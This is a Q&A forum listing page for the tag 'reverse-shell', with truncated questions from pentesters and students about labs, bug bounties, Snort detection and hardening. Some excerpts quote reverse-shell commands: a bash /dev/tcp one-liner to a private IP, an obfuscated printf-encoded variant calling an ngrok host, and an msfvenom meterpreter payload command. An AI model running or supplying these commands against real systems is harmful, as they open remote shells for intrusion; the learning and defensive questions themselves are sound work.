Skip to main content

Questions tagged [reverse-shell]

1 vote
1 answer
212 views

My lab has these restrictions: 1. Inbound and Outbound HTTP connections are allowed from CONFLUENCE01. 2. For Non-HTTP connections, only inbound TCP is allowed at port 8090 of CONFLUENCE01. 3. ...
Wonjae Oh's user avatar
1 vote
1 answer
207 views

Beginner pentester here. I'm testing a bug bounty website and found a potential SSRF by url injection trying to fetch for another server in the PSF, which leads the server's backend to send several ...
Bronze League Hacker's user avatar
1 vote
0 answers
278 views

I have identified an XXE vulnerability in an XML parser of an application that allows external entities. I used the below crafted xml to do a get request on localhost on port 9090, and on the same ...
anonymous's user avatar
  • 559
1 vote
1 answer
140 views

I am generating a Python payload using msfvenom with the following command: msfvenom -p python/meterpreter_reverse_tcp -f raw --platform python -e generic/none -a python LHOST=192.168.173.137 LPORT=...
Onyz's user avatar
  • 21
2 votes
0 answers
165 views

I'm performing Overpass the hash attack @ TryHackMe > CompTIA Pentest+ > Attacks and Exploits > Lateral Movement and Pivoting > Task 3 > Let's Get to Work! I dumped Key of my target ...
Aryan's user avatar
  • 85
0 votes
0 answers
379 views

I have uploaded a php shell using a file upload vulnerability. But when I hit the .php url after uploading it. It gets downloaded rather than executed. Why is that. And how can I execute my shell code?...
NobinPegasus's user avatar
0 votes
1 answer
174 views

$(/bin/prin[t]f 'ba\x73h -c \x27ba\x73h -i \x3e\x26 /d\x65v/t\x63p/2.t\x63p.eu.ngrok.io/xxxxx 0\x3e\x261\x27') -i: -c: line 1: unexpected EOF while looking for matching `'' I was trying to get a ...
Ankeet Saha's user avatar
1 vote
0 answers
554 views

I'm trying to create a persistence module for OSX systems but first I need to create a reverse shell that spawns and binds on the same computer over a LAN. I'm having trouble creating an executable ...
CJG's user avatar
  • 81
0 votes
1 answer
306 views

I'm working on a university project and I'm trying to identify a reverse shell attack with Snort IDS. For the attack I used Meterpreter/reverse_tcp and analyzed the packets via Wireshark for traces to ...
Mattia cavaliere's user avatar
0 votes
0 answers
1k views

I try to put bash reverse shell as a URL parameter. The command is as follows: bash -i >& /dev/tcp/192.168.56.105/4444 0>&1 I have encoded the above code with URL encoding bash%20-i%20%...
Texicans's user avatar
0 votes
1 answer
243 views

Is it possible to use a tool like netcat to create a listener on the attacker's device with a specific command that when the target device or machine connects to this IP and port, it runs a bash shell ...
19216811's user avatar
0 votes
0 answers
401 views

Reverse shell. A victim server runs a malicious binary which creates an SSH connection to the attacker machine. Then the attacker machine SSH's to the victim server and runs commands (that way you ...
monstercode's user avatar
0 votes
0 answers
309 views

If hypothetically there was a meterpreter shell installed on your pc, are there security features or ways to harden a Windows laptop to prevent the hacker from using the screen share command to spy on ...
Rachel's user avatar
  • 1
0 votes
1 answer
436 views

If a reverse shell target is an administrator does the attacker have admin? I've been trying to find the answer to this but can only find general information on how they connect to a target and not ...
Michael Kershaw's user avatar
1 vote
0 answers
1k views

I'm running a DVWA container on my kali VM using: docker run --rm -it -p 80:80 vulnerables/web-dvwa Network interface details: Kali docker0 int: 172.17.0.1/16 Kali eth0 int: 192.168.1.233/24 DVWA ...
user avatar

15 30 50 per page
1
2 3 4 5